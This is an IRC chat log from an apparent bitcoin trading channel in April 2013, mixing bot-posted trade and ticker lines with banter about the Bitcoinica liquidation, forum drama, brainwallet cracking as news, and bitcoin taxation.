maybe we should dig up the thread and link him to it Apr 27 06:16:31 brb Apr 27 06:17:07 maybe we can get the fellow to tell us which data center his hotwallet is in, too Apr 27 06:17:16 and in which cage Apr 27 06:17:45 cage ? Apr 27 06:17:47 you kid sir. Apr 27 06:18:07 i bet his password has 1337 in it Apr 27 06:18:28 i bet we can trick him into giving us the name of blockchin web wallet Apr 27 06:18:33 ThickAsThieves: I bet it's "p4ssw0rd" Apr 27 06:19:06 i will NEVER find this thread Apr 27 06:19:41 i really want to find the thread where the guy posted his 98k in bitcoinica and minutes later it was gone Apr 27 06:20:05 jcpham: how do you suppose that worked? Apr 27 06:20:24 do you want me to spell it out it gory detail Apr 27 06:20:42 so basically the news out of the us is rthat the us senate is legislating ebay out of business Apr 27 06:20:44 amazon won. Apr 27 06:20:57 which tbh is kinda cool, i always hated paypal. Apr 27 06:21:22 basically the guy revealed his postion on bitcoinica Apr 27 06:21:24 [HAVELOCK] [VTX] 5 @ 0.468 = 2.34 BTC [+] Apr 27 06:21:24 [HAVELOCK] [VTX] 5 @ 0.47 = 2.35 BTC [+] Apr 27 06:21:25 [HAVELOCK] [VTX] 3 @ 0.477999 = 1.434 BTC [+] Apr 27 06:21:41 and several people just went the other way with sufficient funding and he was force liquidated Apr 27 06:21:48 mp, link? Apr 27 06:21:49 because that's how bitcoinica worked Apr 27 06:22:01 jcpham: ok, that makes sense Apr 27 06:22:26 http://www.nytimes.com/2013/04/27/technology/internet-sales-tax-coming-too-late-for-some-stores.html?_r=0 Apr 27 06:22:32 yeah a channel full of guys playing games on bitcoinica is not someone you wanna share info like this with Apr 27 06:23:30 somewhere Apr 27 06:23:53 damn 10:1 leverage at that Apr 27 06:24:52 mircea_popescu, i wrote my congress ppl to not pass that :x Apr 27 06:25:02 mircea_popescu: The linked article suggests that the tax only applies to ebay sellers who gross over $1M Apr 27 06:25:24 mircea_popescu: but yeah, the buraucrats "do what they must, because they can." Apr 27 06:25:29 *bureaucrats Apr 27 06:26:36 amazon is also having trouble eeking out good profits no? Apr 27 06:28:20 it did take them like a decade to become profitable though Apr 27 06:31:32 speaking of idiot passwords, it looks like people have taken to "mining" brainwallets - with results. Apr 27 06:32:03 seems like i've seen that on reddit and elsewhere Apr 27 06:32:12 doesn't surprise me Apr 27 06:32:20 [BTCTC] [ASICMINER-PT] 1 @ 1.2718 BTC [-] Apr 27 06:32:37 wonder what the biggest brainmining find so far was Apr 27 06:35:45 https://sites.google.com/site/hannahlogo/screen-shots-4 Apr 27 06:35:48 ThickAsThieves no., they grew 22% Apr 27 06:35:58 lots of gold on that site about bitcoinica Apr 27 06:36:03 asciilifeform the mining brainwallets is real old news. Apr 27 06:36:22 joeykrim they don't listen so well do they. Apr 27 06:37:56 that guys entire holding are detailed there jeez Apr 27 06:37:59 personally, i feel that amazon does to little branding Apr 27 06:38:03 too* Apr 27 06:38:27 they are not properly protecting what they are forgoing so much profit for Apr 27 06:38:32 [BTCTC] [ASICMINER-PT] 1 @ 1.25 BTC [-] Apr 27 06:39:07 https://plus.google.com/100386605739064901646/posts/FSb5J3m9rxz Apr 27 06:39:11 i'm so boss Apr 27 06:39:48 http://i.imgur.com/mbAEE.png Apr 27 06:40:55 https://bitcointalk.org/index.php?topic=59969.0;all Apr 27 06:40:57 boom Apr 27 06:41:24 haha wd Apr 27 06:41:29 this is exactly where the phrase zhoutonged originated Apr 27 06:41:34 know your bitcoin Apr 27 06:41:51 all of this lore laid out for you Apr 27 06:43:14 mircea_popescu: I missed the brainmining thing when it started, and found out about it by sheer accident - ran across some published code which lets even idiots try their hand at it, while looking for something else Apr 27 06:43:47 asciilifeform i recall someone pointing out hashing god yields some btc years ago Apr 27 06:43:55 jcpham totally. Apr 27 06:45:13 mircea_popescu, lol .. no they sure dont Apr 27 06:45:47 also realize some of those thread commenters are pirate lenders Apr 27 06:45:57 oooh plot thickens Apr 27 06:46:04 let's write a novel Apr 27 06:46:54 he thinks he can get away from this crime!!!! Apr 27 06:47:38 Who were interested in this liquidation? nobody would buy 20 000BTC just for fun, and nobody could get profit from this trade except..... right.. bitcoinica. Apr 27 06:47:43 epic last words Apr 27 06:48:10 [HAVELOCK] [VTX] 1 @ 0.4601 BTC [-] Apr 27 06:48:11 except he goes on to say "I am 7 years in trading, I know who make profits and how." Apr 27 06:49:00 jcpham his argument that zhou was bucketshopping is convincing on the face Apr 27 06:49:11 it's also supported by ulterior email leaks etc. Apr 27 06:49:41 oh i'm not saying he wasn't Apr 27 06:50:04 it's awesome how zhoutong chimes in after his customer just got force liquidated like nothing happened Apr 27 06:50:19 when at the tim 85% of mtgox's volume was bitcoinica Apr 27 06:50:41 so a trade gox is all it took Apr 27 06:50:56 isn't that wild? Apr 27 06:51:02 it was that high from bitcoinica? Apr 27 06:51:12 right? Apr 27 06:51:20 know your bitcoin Apr 27 06:51:28 A crime how, exactly? You do know what a bucket shop is, right? And you know why they aren't allowed in a regulated market? Apr 27 06:51:28 Will the internet investigate? Where will he be jailed, or do you plan to have him digitized and encrypted in a flash drive? Apr 27 06:51:29 totally. Apr 27 06:51:30 jcpham: i know the bitcoin i lost in bitcoinica Apr 27 06:51:38 that i never actually traded with Apr 27 06:51:40 dawww Apr 27 06:51:41 lol Apr 27 06:51:53 i put coin in like 2 days before shit went to hell Apr 27 06:51:53 i lost some usd i think but not enough to care about Apr 27 06:52:06 i lost enough to sting a pretty good bit Apr 27 06:52:27 my condolences. bitcoinica and gox ran each other for a time Apr 27 06:54:02 ACHTUNG! Alles touristen und non-technischen looken peepers! Apr 27 06:54:02 Fingergrabbing and pressing the cnoeppkes from the computers is allowed for die experts only! Apr 27 06:54:02 So relaxen und watchen das blinkenlights! Apr 27 06:54:25 i remember now why i remember that event Apr 27 06:54:31 tis a memorable one Apr 27 06:54:42 so many scammer tags in that thread Apr 27 06:54:49 mircea_popescu: I once heard of a mutilated-English version of this warning, that hung in German machine rooms. Apr 27 06:54:54 it's like a who's who Apr 27 06:55:12 even the JRO ringcoin guy Apr 27 06:55:18 where is kronos.io Apr 27 06:55:37 there's more scandal Apr 27 06:55:52 ThickAsThieves noticeably jrowens doesn't have one Apr 27 06:55:57 that whole thread exposes a seedy core Apr 27 06:55:59 about half the scammers in there are tagged. Apr 27 06:56:11 [HAVELOCK] [SDICE] 12 @ 0.3 = 3.6 BTC [-] Apr 27 06:56:13 [BTCTC] [ASICMINER-PT] 1 @ 1.2301 BTC [-] Apr 27 06:56:57 because for me it happened realtime in #bitcoin and #bitcoin-otc Apr 27 06:58:09 ;;asks 138 Apr 27 06:58:09 There are currently 326.79324 bitcoins offered at or under 138.0 USD, worth 45081.833772 USD in total. | Data vintage: 61.8149 seconds Apr 27 06:58:17 ;;bids 135 Apr 27 06:58:17 There are currently 1524.0918 bitcoins demanded at or over 135.0 USD, worth 206359.098706 USD in total. | Data vintage: 69.7801 seconds Apr 27 06:58:26 "Trading what? Most traders I know don't know shit about trading something as volatile as this. Reading through, people appear to not understand how futures and options work, and now they are learning, are annoyed at their own ignorance." Apr 27 06:58:31 this from... wait for it... harnett. Apr 27 06:58:40 indeed lulzmine that thread jcpham Apr 27 06:58:52 [MPEX] [S.MPOE] 636 @ 0.0007011 = 0.4459 BTC [-] Apr 27 06:58:52 lol harnett Apr 27 06:58:54 [MPEX] [S.MPOE] 3000 @ 0.00069846 = 2.0954 BTC [-] Apr 27 06:59:00 How many coins did Harnett lose? Apr 27 06:59:05 "Starfish Bank" lolol Apr 27 06:59:10 just document and wait for the right moment to link someone to it Apr 27 06:59:16 ;;asks 139 Apr 27 06:59:18 There are currently 2311.797 bitcoins offered at or under 139.0 USD, worth 320766.335481 USD in total. | Data vintage: 0.0035 seconds Apr 27 06:59:27 there's people out there that need ot read it i'm sure Apr 27 07:00:11 -PR could probably ruin someone's day with if timed properly Apr 27 07:00:17 timing is everything, really Apr 27 07:00:32 you kidding ? that's what she does, ruins people's days Apr 27 07:00:35 on a daily basis Apr 27 07:00:38 hahha Apr 27 07:00:40 lmao Apr 27 07:00:44 I HAVE THOUSAND OF DOLLARS ON THE LINE MAKE UP YOUR MIND!!! Apr 27 07:00:59 epic thread is epic. Apr 27 07:01:01 Holy shit maybe I shouldn't have fucked with him so much..a thousand dollars is a lot of loot lol Apr 27 07:01:12 who's nadzerz Apr 27 07:01:20 apparently some noob Apr 27 07:01:29 he's in #mtgoxlive Apr 27 07:01:42 Definately sell. Apr 27 07:01:42 I mean buy!! Damnit sorry! Apr 27 07:01:48 oops :) Apr 27 07:02:01 [BTCTC] [ASICMINER-PT] 1 @ 1.269899 BTC [+] Apr 27 07:02:09 i just bought my first whole bitcoin today...SELL. Apr 27 07:02:10 [BTCTC] [ASICMINER-PT] 2 @ 1.269999 = 2.54 BTC [+] Apr 27 07:03:27 so everyone sits in mtgoxlive and provides free armchair analysis Apr 27 07:03:34 that's neat Apr 27 07:04:33 *valuable* free armchair analysis Apr 27 07:05:08 mine wasn't bad until i went back and forth too many times..if they rate in there i'm doomed Apr 27 07:05:28 so like..if i say BUY 5 times and SELL 3 times, you will know what to do: BUY of course. Apr 27 07:05:54 lmao! random forum guy : "wow that was racist borring and full of shit" mpoe-pr : "You only think it's racist because your mother was a whore." Apr 27 07:06:04 i'm sure of myself after like 8 or 9 times looking at the ticker making a decision Apr 27 07:06:18 heh Apr 27 07:13:11 [HAVELOCK] [VTX] 1 @ 0.4611 BTC [+] Apr 27 07:15:52 lol Apr 27 07:16:03 i love that lin Apr 27 07:16:12 line Apr 27 07:16:23 i like most lines Apr 27 07:16:29 i need to donate to pr just for the laugh Apr 27 07:16:32 o shit did i say that Apr 27 07:17:21 [BTCTC] [ASICMINER-PT] 1 @ 1.24 BTC [-] Apr 27 07:17:24 [BTCTC] [ASICMINER-PT] 1 @ 1.2301 BTC [-] Apr 27 07:17:28 [BTCTC] [ASICMINER-PT] 1 @ 1.21 BTC [-] Apr 27 07:22:10 [HAVELOCK] [VTX] 4 @ 0.4612 = 1.8448 BTC [+] Apr 27 07:30:04 [BTCTC] [ASICMINER-PT] 2 @ 1.23 = 2.46 BTC [+] Apr 27 07:30:18 [MPEX] [S.MPOE] 5537 @ 0.000692 = 3.8316 BTC [-] Apr 27 07:30:20 [MPEX] [S.MPOE] 4000 @ 0.00068754 = 2.7502 BTC [-] Apr 27 07:30:32 [MPEX] [S.MPOE] 14 @ 0.00068584 = 0.0096 BTC [-] Apr 27 07:30:34 [MPEX] [S.MPOE] 3286 @ 0.00068584 = 2.2537 BTC [-] Apr 27 07:30:47 [MPEX] [S.MPOE] 3163 @ 0.00068583 = 2.1693 BTC [-] Apr 27 07:33:53 [BTCTC] [ASICMINER-PT] 2 @ 1.22 = 2.44 BTC [-] Apr 27 07:45:47 [BTCTC] [ASICMINER-PT] 1 @ 1.24989 BTC [+] Apr 27 07:45:52 [BTCTC] [ASICMINER-PT] 3 @ 1.24999 = 3.75 BTC [+] Apr 27 07:46:22 [BTCTC] [ASICMINER-PT] 1 @ 1.24999 BTC [+] Apr 27 07:59:17 GoMaD GordonG3kko gribble grubles Guest50936 Guest73404 Guest85732 Guest96717 guruvan Apr 27 07:59:42 <[\\\]> mircea_popescu, how has your girl not ripped into this one https://bitcointalk.org/index.php?topic=187600 Apr 27 07:59:46 [BTCTC] [ASICMINER-PT] 1 @ 1.2201 BTC [-] Apr 27 07:59:50 [BTCTC] [ASICMINER-PT] 1 @ 1.21012 BTC [-] Apr 27 08:00:07 ;;title Apr 27 08:00:09 (title ) -- Returns the HTML ... of a URL. Apr 27 08:00:14 ;;title https://bitcointalk.org/index.php?topic=187600 Apr 27 08:00:16 Butterfly Labs Apr 27 08:00:24 kinda stale by now neh ? Apr 27 08:01:19 [BTCTC] [ASICMINER-PT] 5 @ 1.201 = 6.005 BTC [-] Apr 27 08:01:53 https://bitcointalk.org/index.php?topic=174620.msg1957020#msg1957020 lol Apr 27 08:02:01 [BTCTC] [ASICMINER-PT] 1 @ 1.2 BTC [-] Apr 27 08:03:53 lol whoops, smoothie caught on ? Apr 27 08:04:44 [MPEX] [S.MPOE] 3985 @ 0.00068583 = 2.733 BTC [-] Apr 27 08:04:55 after it was pointed out to him, but yes Apr 27 08:05:14 but the point is, if smoothie caught on, who can he trick? Apr 27 08:05:17 <[\\\]> whats up with this hashpack place? Apr 27 08:05:24 <[\\\]> do people not see it for the the ponzi it is? Apr 27 08:05:36 never heard of hashpack :/ Apr 27 08:06:44 [BTCTC] [ASICMINER-PT] 8 @ 1.19 = 9.52 BTC [-] Apr 27 08:06:45 hashpower you mean ? Apr 27 08:07:17 <[\\\]> no Apr 27 08:07:18 <[\\\]> hashpack Apr 27 08:07:31 <[\\\]> hashpack.com Apr 27 08:07:34 <[\\\]> err Apr 27 08:07:35 <[\\\]> no Apr 27 08:07:39 <[\\\]> lemme find it again Apr 27 08:07:55 <[\\\]> hashrack.com/hashpacks Apr 27 08:08:24 um Apr 27 08:08:26 needs moar hash Apr 27 08:08:47 hash.ish/hashrack/hahspacks/hushhush Apr 27 08:09:34 How much takes a hashpack to start mining? Apr 27 08:09:34 This has variable timing, and it depends on different factors Apr 27 08:09:35 totally. Apr 27 08:11:09 <[\\\]> lol Apr 27 08:11:10 [BTCTC] [CRYPTO-TRADE] 1 @ 0.198 BTC [-] Apr 27 08:11:18 <[\\\]> the broken english makes it more trustworthy Apr 27 08:13:41 [BTCTC] [ASICMINER-PT] 3 @ 1.19 = 3.57 BTC [-] Apr 27 08:14:32 [BTCTC] [ASICMINER-PT] 1 @ 1.261 BTC [+] Apr 27 08:15:29 [BTCTC] [ASICMINER-PT] 2 @ 1.261 = 2.522 BTC [+] Apr 27 08:15:59 [BTCTC] [ASICMINER-PT] 2 @ 1.2618 = 2.5236 BTC [+] Apr 27 08:16:34 [BTCTC] [ASICMINER-PT] 1 @ 1.2619 BTC [+] Apr 27 08:17:09 [BTCTC] [ASICMINER-PT] 1 @ 1.262 BTC [+] Apr 27 08:17:14 totally. Apr 27 08:17:43 [BTCTC] [ASICMINER-PT] 1 @ 1.25 BTC [-] **** BEGIN LOGGING AT Sat Apr 27 14:04:43 2013 Apr 27 14:04:59 ;;ticker Apr 27 14:05:06 BTCUSD ticker | Best bid: 135.99931, Best ask: 136.00000, Bid-ask spread: 0.00069, Last trade: 135.99930, 24 hour volume: 56750.66339492, 24 hour low: 129.51001, 24 hour high: 139.20000, 24 hour vwap: 135.88419 Apr 27 14:07:53 Our MySQL server started to fail this night. We're migrating to postgres now, but this will take some time. Apr 27 14:07:55 sweet. Apr 27 14:19:10 [BTCTC] [ASICMINER-PT] 1 @ 1.258 BTC [+] Apr 27 14:28:15 [MPEX] [S.MPOE] 2400 @ 0.00069293 = 1.663 BTC [+] Apr 27 14:33:43 ;;ticker 487.54 * [ticker --last] Apr 27 14:33:44 (ticker [--bid|--ask|--last|--high|--low|--avg|--vol] [--currency XXX]) -- Return pretty-printed mtgox ticker. If one of the result options is given, returns only that numeric result (useful for nesting in calculations). If '--currency XXX' option is given, returns ticker for that three-letter currency code. It is up to you to make sure that the three letter code you enter is a valid (1 more message) Apr 27 14:33:51 ;;calc 487.54 * [ticker --last] Apr 27 14:33:52 66524.6721118 Apr 27 14:33:54 durr hurr Apr 27 14:38:44 why there is absolutely no options for sale\buy right now? Apr 27 14:39:25 Cylta http://bitcoincharts.com/about/markets-api/ Apr 27 14:40:34 mircea_popescu: so, mpex.co need to have connection to bitcoincharts.com to func... Apr 27 14:40:53 no. Apr 27 14:41:09 the options bot uses that feed to price options. if no feed, no offers. Apr 27 14:41:20 you can still make your own, sell them, buy others' etc. Apr 27 14:41:38 ah, so there is nobody from alive users, who want to sell\buy options? Apr 27 14:42:21 the new month just started like 12 hours ago or w/e, i guess nobody has made any yet. Apr 27 14:43:22 but there was N section (for next month), and they should be transported in T section... but okay, i get it. Apr 27 14:46:36 Cylta the book gets cleared Apr 27 14:51:01 anyone know the average price bot command? Apr 27 14:51:14 $avg Apr 27 14:51:15 kakobrekla: An error has occurred and has been logged. Please contact this bot's administrator for more information. Apr 27 14:51:21 aa Apr 27 14:51:31 trap. Apr 27 14:51:32 feed down maybe? Apr 27 14:51:45 scam Apr 27 14:51:50 milk Apr 27 14:51:55 silk! Apr 27 14:52:04 when working, how is that calculated? Apr 27 14:52:18 vwap of all trades past 24 hours across exchanges Apr 27 14:52:54 all exchanges or a selection? Apr 27 14:53:16 and if selection, then which of them Apr 27 14:53:44 I'd assume from everything they connect too, you can see their list when they're back up Apr 27 14:53:50 is in channel the only place to get the stat or is it posted somewhere? Apr 27 14:54:01 it's posted on the bitcoincharts site Apr 27 14:54:18 oh yeah? hadn't noticed it before. Apr 27 14:54:19 normally it's this page: http://bitcoincharts.com/markets/currencies/ Apr 27 14:55:00 ok, cool. thanks all. Apr 27 14:55:28 ColdHardMetal its the http://bitcoincharts.com/about/markets-api/ this feed Apr 27 14:56:17 mp: looks like I'll need to take your word for it for awhile :) Apr 27 14:57:29 you can just look at the google cache, http://webcache.googleusercontent.com/search?q=cache:ub2mLFjMpIwJ:bitcoincharts.com/about/markets-api/+&cd=1&hl=en&ct=clnk Apr 27 14:58:03 ColdHardMetal it's tctm's service you can prolly bug him Apr 27 14:58:12 you know each other neh ? Apr 27 14:58:30 to a degree, yes. Apr 27 14:59:04 tcatm* Apr 27 15:09:54 check this out : https://www.youtube.com/watch?v=j2mdYX1nF_Y Apr 27 15:10:09 in 1999 milton friedman describes bitcoin as a future certainty Apr 27 15:10:16 (he doesn't call it bitcoin of course) Apr 27 15:13:43 awww Apr 27 15:13:48 send him a coin Apr 27 15:14:02 erm Apr 27 15:14:12 he died Apr 27 15:14:15 mircea_popescu: but isnt cryptomicon older than that? Apr 27 15:14:37 Diablo-D3 afaik that's 2000 Apr 27 15:14:54 WIKIPEDIA, LAAAAAAUNCH! Apr 27 15:15:03 not trying to say he invented it or anything. Apr 27 15:15:13 nope, 1999. Apr 27 15:15:14 heh. Apr 27 15:15:35 mircea_popescu: no, but I keep thinking of some sort of mathematical currency thats older than this Apr 27 15:15:44 but I can never quite remember what it is Apr 27 15:16:21 see ? misterycoin Apr 27 15:16:32 nobody can remember it ever. a little problematic for brain wallets. Apr 27 15:16:56 no, its something I read like 20 years ago Apr 27 15:17:43 https://bitcointalk.org/index.php?topic=188516.msg1958615#msg1958615 Apr 27 15:21:49 meh Apr 27 15:21:52 such a sisyphus job Apr 27 15:22:36 the drama that backs our bitcoinz Apr 27 15:23:03 [HAVELOCK] [SDICE] 24 @ 0.3 = 7.2 BTC [-] Apr 27 15:23:48 http://polimedia.us/dtng/c/thumb/136706164156s.jpg bwahahaha Apr 27 15:23:51 who dunnit ? Apr 27 15:24:48 er Apr 27 15:24:56 thats the thumbnail, jackass Apr 27 15:25:03 lol oops Apr 27 15:25:11 http://polimedia.us/dtng/c/src/136706164156.jpg Apr 27 15:26:05 but but supernode 1.5! Apr 27 15:26:17 mircea_popescu: I have no clue what that image means Apr 27 15:26:27 o you're behind your drama / Apr 27 15:26:36 there's this slightly weird finish guy Apr 27 15:27:15 *finnish Apr 27 15:27:30 people like smoothie and goat have been milking *him* for lulz all over the forum. Apr 27 15:27:39 think! smoothie now has his own lolcow. Apr 27 15:27:50 and this is why I dont read the forums often Apr 27 15:29:26 i doubt anyone reads th forums anymore Apr 27 15:29:29 people just post Apr 27 15:33:02 [HAVELOCK] [SDICE] 1 @ 0.3 BTC [-] Apr 27 15:34:03 [HAVELOCK] [SDICE] 1 @ 0.3 BTC [-] Apr 27 15:49:32 https://bitcointalk.org/index.php?topic=174620.msg1958908#msg1958908 Apr 27 15:49:35 O_O Apr 27 15:49:44 this shit continiues to amaze me Apr 27 15:54:10 [BTCTC] [BTC-BOND] 5 @ 0.0099 = 0.0495 BTC [-] Apr 27 15:54:50 we have a selloff Apr 27 15:55:47 922btc at once. not so much Apr 27 15:58:48 ok this is just silly Apr 27 16:00:45 2k sell to 130 and after that, 2k buy to 140 Apr 27 16:01:04 maybe someone put order in the wrong box Apr 27 16:03:48 or it's his way to make a donation to poor traders =) Apr 27 16:05:39 [MPEX] [S.MPOE] 8154 @ 0.00069293 = 5.6502 BTC [+] Apr 27 16:05:40 [MPEX] [S.MPOE] 1546 @ 0.000695 = 1.0745 BTC [+] Apr 27 16:05:50 hey why is nobody trading on mtgox right now? Apr 27 16:05:55 why the silence? Apr 27 16:06:20 what silence Apr 27 16:11:20 http://www.cbc.ca/news/business/story/2013/04/26/business-bitcoin-tax.htm Apr 27 16:11:24 ;;ticker Apr 27 16:11:24 BTCUSD ticker | Best bid: 133.50040, Best ask: 133.99027, Bid-ask spread: 0.48987, Last trade: 133.50030, 24 hour volume: 50817.48210313, 24 hour low: 131.00210, 24 hour high: 139.88000, 24 hour vwap: 135.92900 Apr 27 16:14:48 No surprise there, these are not new rules. Nice to get an opinion from the CRA them though so people needn't stay away from Bitcoin due to FUD. Apr 27 16:15:45 indeed, a news piece which basically says, when it rains outside use umbrella. Apr 27 16:16:10 Right, Canadians trading anything for anything else are supposed to pay tax on exchanges and on gains. Apr 27 16:16:16 [MPEX] [S.MPOE] 4250 @ 0.00068661 = 2.9181 BTC [-] Apr 27 16:16:17 [MPEX] [S.MPOE] 7585 @ 0.00068476 = 5.1939 BTC [-] Apr 27 16:16:42 I'm just grateful no one is talking about *new* laws to add another layer of cruft to the legal and tax system. Apr 27 16:17:15 don't worry, it;'s coming Apr 27 16:17:51 No doubt Apr 27 16:21:55 so how can they tax btc? are they going to fork the blockchain or something Apr 27 16:23:04 at the exchange Apr 27 16:27:39 kakobrekla lol Apr 27 16:27:41 they'd rely on you reporting things, probably Apr 27 16:27:45 much as they do now Apr 27 16:28:00 2 parts: 1, a capital gains tax on trading gains and 2, a VAT (called GST or HST in most of Canada) if you sell goods/services for bitcoin Apr 27 16:28:15 But yes, you have to report it yourself. Apr 27 16:28:51 So some people won't, and "legitimate" businesses will Apr 27 16:28:56 shut up Apr 27 16:29:00 :) Apr 27 16:29:10 I think you popped in out of nowhere to say that to me once. Apr 27 16:30:37 I fig'd I'd ignore you then but couldn't resist. Added a smiley so you know I'm not a deliberate asshole. Apr 27 16:31:14 the exchanges could report your $ much the same way that banks can Apr 27 16:31:49 Before I go back to ignoring you, yes, taxes would apply on CAD equivalent just as they would for any other currency or commodity or local funny money. Old rules, nothing new. Apr 27 16:32:07 unbalanced has the ticket Apr 27 16:34:59 wooow... Apr 27 16:37:46 what does it mean, if bondholder crossed with a red line? Apr 27 16:38:15 in meaning "they sold their assets" or "they are blocked"?.. Apr 27 16:39:27 open your magazine with predictions =) Apr 27 16:41:57 [BTCTC] [ASICMINER-PT] 1 @ 1.249 BTC [-] Apr 27 16:43:02 [BTCTC] [ASICMINER-PT] 2 @ 1.255 = 2.51 BTC [+] Apr 27 16:45:12 [BTCTC] [ASICMINER-PT] 1 @ 1.255 BTC [+] Apr 27 16:45:16 [BTCTC] [ASICMINER-PT] 12 @ 1.249 = 14.988 BTC [-] Apr 27 16:48:32 tiberiusiv: what are they doing? trading really close to the highs and lows? Apr 27 16:48:59 you said that people are losing huge stabilizing btc Apr 27 16:49:33 [BTCTC] [BASIC-MINING] 1 @ 0.4232 BTC [+] Apr 27 16:49:54 but something tells me he really doesnt lose anything Apr 27 16:50:18 :/ Apr 27 16:51:16 [BTCTC] [ASICMINER-PT] 1 @ 1.249 BTC [-] Apr 27 16:51:26 theres a long stretch between being a fraud and supplying a service (middleman) that you collect a small fee here and there for Apr 27 17:01:26 [BTCTC] [CRYPTO-TRADE] 5 @ 0.198 = 0.99 BTC [-] Apr 27 17:04:41 [BTCTC] [S.DICE-PT] 10 @ 0.00353 = 0.0353 BTC [-] Apr 27 17:08:22 [BTCTC] [S.DICE-PT] 45 @ 0.003535 = 0.1591 BTC [+] Apr 27 17:09:58 any reason why bot isnt selling? Apr 27 17:10:00 [BTCTC] [BITVPS] 1 @ 0.00188 BTC [+] Apr 27 17:10:15 (optobot) Apr 27 17:13:43 [BTCTC] [ASICMINER-PT] 4 @ 1.2514 = 5.0056 BTC [+] Apr 27 17:17:47 [MPEX] [S.MPOE] 4841 @ 0.00068476 = 3.3149 BTC [-] Apr 27 17:21:26 [BTCTC] [ASICMINER-PT] 1 @ 1.2592 BTC [+] Apr 27 17:25:15 [BTCTC] [ASICMINER-PT] 1 @ 1.24999 BTC [-] Apr 27 17:26:26 [BTCTC] [ASICMINER-PT] 7 @ 1.24999 = 8.7499 BTC [-] Apr 27 17:28:31 [MPEX] [S.DICE] 500 @ 0.00320485 = 1.6024 BTC [+] Apr 27 17:31:21 tiberiusiv: you are somethin else dude..im not even gonna bother Apr 27 17:31:55 i'd stop with whatever drugs you're takin man.. Apr 27 17:31:59 try something else Apr 27 17:37:25 There are currently 164387.58 bitcoins demanded at or over 50.0 USD, worth 14228097.6008 USD in total. | Data vintage: 0.0096 seconds Apr 27 17:37:31 There are currently 72755.388 bitcoins offered at or under 200.0 USD, worth 12189626.4661 USD in total. | Data vintage: 6.3651 seconds Apr 27 17:58:37 [BTCTC] [ASICMINER-PT] 1 @ 1.2474 BTC [-] Apr 27 18:05:34 [BTCTC] [ASICMINER-PT] 1 @ 1.24999 BTC [+] Apr 27 18:05:39 [BTCTC] [ASICMINER-PT] 1 @ 1.2555 BTC [+] Apr 27 18:05:43 [BTCTC] [ASICMINER-PT] 8 @ 1.2592 = 10.0736 BTC [+] Apr 27 18:30:59 [BTCTC] [ASICMINER-PT] 1 @ 1.2301 BTC [-] Apr 27 18:32:22 ;;ticker Apr 27 18:32:23 BTCUSD ticker | Best bid: 134.02020, Best ask: 134.56000, Bid-ask spread: 0.53980, Last trade: 134.02020, 24 hour volume: 44677.75219501, 24 hour low: 131.00210, 24 hour high: 139.88000, 24 hour vwap: 135.74475 Apr 27 18:48:03 [BTCTC] [BTC-GOLD] 22 @ 0.00489 = 0.1076 BTC [+] Apr 27 18:48:49 [BTCTC] [BTC-GOLD] 1 @ 0.0337 BTC [+] Apr 27 18:51:33 [BTCTC] [S.MPOE-PT] 50 @ 0.000695 = 0.0348 BTC [+] Apr 27 18:51:43 [BTCTC] [S.MPOE-PT] 30 @ 0.000695 = 0.0209 BTC [+] Apr 27 18:51:48 [BTCTC] [S.MPOE-PT] 9 @ 0.000695 = 0.0063 BTC [+] Apr 27 18:59:27 [BTCTC] [S.MPOE-PT] 50 @ 0.000696 = 0.0348 BTC [+] Apr 27 18:59:28 [BTCTC] [COGNITIVE] 12 @ 0.1983 = 2.3796 BTC [+] Apr 27 19:00:18 [BTCTC] [S.MPOE-PT] 80 @ 0.000696 = 0.0557 BTC [+] Apr 27 19:02:37 [BTCTC] [ASICMINER-PT] 1 @ 1.254 BTC [+] Apr 27 19:10:36 ;;bids Apr 27 19:10:37 (bids [--under] ) -- Calculate the amount of bitcoin demanded at or over . If '--under' option is given, find coins or at or under . Apr 27 19:27:39 [BTCTC] [BTC-GOLD] 2 @ 0.00111 = 0.0022 BTC [-] Apr 27 19:31:28 [BTCTC] [S.MPOE-PT] 10 @ 0.000696 = 0.007 BTC [+] Apr 27 19:32:49 [BTCTC] [ASICMINER-PT] 1 @ 1.231 BTC [-] Apr 27 19:32:52 [BTCTC] [ASICMINER-PT] 1 @ 1.2302 BTC [-] Apr 27 19:32:55 [BTCTC] [ASICMINER-PT] 2 @ 1.2301 = 2.4602 BTC [-] Apr 27 19:38:39 [BTCTC] [ASICMINER-PT] 1 @ 1.2201 BTC [-] Apr 27 19:39:43 [BTCTC] [ASICMINER-PT] 1 @ 1.21011 BTC [-] Apr 27 19:40:39 [MPEX] [S.MPOE] 4400 @ 0.00069357 = 3.0517 BTC [+] Apr 27 19:40:54 [BTCTC] [ASICMINER-PT] 1 @ 1.2012 BTC [-] Apr 27 19:43:29 hey whats up Apr 27 19:45:46 did mpoe pay their dividend yet for april? Apr 27 19:46:02 [MPEX] [S.MPOE] 1100 @ 0.00069357 = 0.7629 BTC [+] Apr 27 19:46:04 [MPEX] [S.MPOE] 3765 @ 0.00069724 = 2.6251 BTC [+] Apr 27 19:46:06 [MPEX] [S.MPOE] 1685 @ 0.00069796 = 1.1761 BTC [+] Apr 27 19:49:41 peterl: not yet Apr 27 19:49:52 the monthly statement is out though... Apr 27 19:51:05 Hmmm.... gox queue down to 15,000 Apr 27 19:53:14 maybe people are trying to use other exchanges? Apr 27 19:54:28 oh Apr 27 19:54:34 so they stopped de-amling ppl Apr 27 19:55:03 [BTCTC] [ASICMINER-PT] 1 @ 1.23 BTC [+] Apr 27 19:55:09 my friend has been trading ~500BTC on there with no verification Apr 27 19:55:18 they decided he needed to be verified to do that Apr 27 19:55:25 he is 15,000 now Apr 27 19:55:30 hm Apr 27 19:57:05 [BTCTC] [B.YABMC] 1 @ 0.0163 BTC [+] Apr 27 20:07:59 (05:09) < mircea_popescu> check this out : https://www.youtube.com/watch?v=j2mdYX1nF_Y <<< Thanks for posting this Milton Friedman vid! Apr 27 20:08:12 so awesome Apr 27 20:27:00 [MPEX] [S.MPOE] 6600 @ 0.00069796 = 4.6065 BTC [+] Apr 27 20:34:12 [BTCTC] [ASICMINER-PT] 1 @ 1.238 BTC [+] Apr 27 20:34:52 [BTCTC] [ASICMINER-PT] 1 @ 1.239 BTC [+] Apr 27 20:35:01 [BTCTC] [ASICMINER-PT] 2 @ 1.23955 = 2.4791 BTC [+] Apr 27 20:40:57 [BTCTC] [S.MPOE-PT] 100 @ 0.000642 = 0.0642 BTC [-] Apr 27 20:41:00 [BTCTC] [S.MPOE-PT] 5 @ 0.000642 = 0.0032 BTC [-] Apr 27 20:41:03 [HAVELOCK] [SDICE] 1 @ 0.32 BTC [+] Apr 27 20:41:26 [BTCTC] [S.MPOE-PT] 124 @ 0.000641 = 0.0795 BTC [-] Apr 27 20:55:35 [BTCTC] 